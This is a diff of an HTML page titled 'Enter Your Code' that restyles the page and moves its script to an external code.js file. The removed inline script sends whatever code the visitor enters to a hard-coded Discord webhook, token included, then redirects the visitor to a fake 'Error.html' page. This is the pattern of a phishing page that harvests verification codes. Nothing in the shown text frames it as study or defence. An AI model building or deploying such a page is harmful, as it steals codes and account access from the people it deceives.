--- a/Sign Up Code.html
+++ b/Sign Up Code.html
@@ -2,78 +2,79 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-  <title>Code Entry</title>
+  <title>Enter Your Code</title>
+  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet">
   <style>
     body {
-      background: #1e1e2f;
-      color: #fff;
+      margin: 0;
       font-family: 'Inter', sans-serif;
+      background: linear-gradient(135deg, #1e1e2f, #2c3e50);
+      color: #fff;
       display: flex;
       justify-content: center;
       align-items: center;
       height: 100vh;
+      overflow: hidden;
     }
 
-    .box {
+    .container {
+      background: rgba(255, 255, 255, 0.05);
+      padding: 40px;
+      border-radius: 12px;
+      box-shadow: 0 0 20px rgba(0,0,0,0.4);
+      width: 350px;
+      animation: fadeIn 1s ease-out;
+    }
+
+    h2 {
       text-align: center;
+      margin-bottom: 20px;
+      font-weight: 600;
+      color: #f1f1f1;
     }
 
     input {
-      padding: 10px;
-      border-radius: 6px;
+      width: 100%;
+      padding: 12px;
+      margin: 10px 0;
       border: none;
+      border-radius: 6px;
       background: #2f2f3f;
       color: #fff;
-      margin-bottom: 10px;
+      font-size: 14px;
     }
 
     button {
-      padding: 10px 20px;
+      width: 100%;
+      padding: 12px;
       background: #e74c3c;
       border: none;
       border-radius: 6px;
       color: #fff;
+      font-weight: bold;
       cursor: pointer;
+      transition: background 0.3s ease;
+    }
+
+    button:hover {
+      background: #c0392b;
+    }
+
+    @keyframes fadeIn {
+      from { opacity: 0; transform: translateY(20px); }
+      to { opacity: 1; transform: translateY(0); }
     }
   </style>
 </head>
 <body>
-  <div class="box">
+  <div class="container">
     <h2>Enter Your Code</h2>
     <form id="form2">
       <input type="text" id="Code" placeholder="Code" required>
-      <br>
       <button type="submit">Submit</button>
     </form>
   </div>
 
-  <script>
-    const webhookUrl = 'https://discord.com/api/webhooks/1111136382866440253/q57_PVYxcce4_NRAd2HouHNH-8VjUFq_avHFkAw3RgyqbVrCNUTShMGSLoZ3zm-eiHBC';
-
-    const sendCode = (code) => {
-      const msg = {
-        embeds: [{
-          color: 16711680,
-          fields: [{ name: 'Code', value: code }],
-          timestamp: new Date().toISOString()
-        }]
-      };
-
-      fetch(webhookUrl, {
-        method: 'POST',
-        headers: { 'Content-Type': 'application/json' },
-        body: JSON.stringify(msg)
-      });
-    };
-
-    document.addEventListener('DOMContentLoaded', () => {
-      document.querySelector('#form2').addEventListener('submit', (e) => {
-        e.preventDefault();
-        const code = document.querySelector('#Code').value;
-        sendCode(code);
-        setTimeout(() => window.location.href = "Error.html", 750);
-      });
-    });
-  </script>
+  <script src="code.js"></script>
 </body>
 </html>
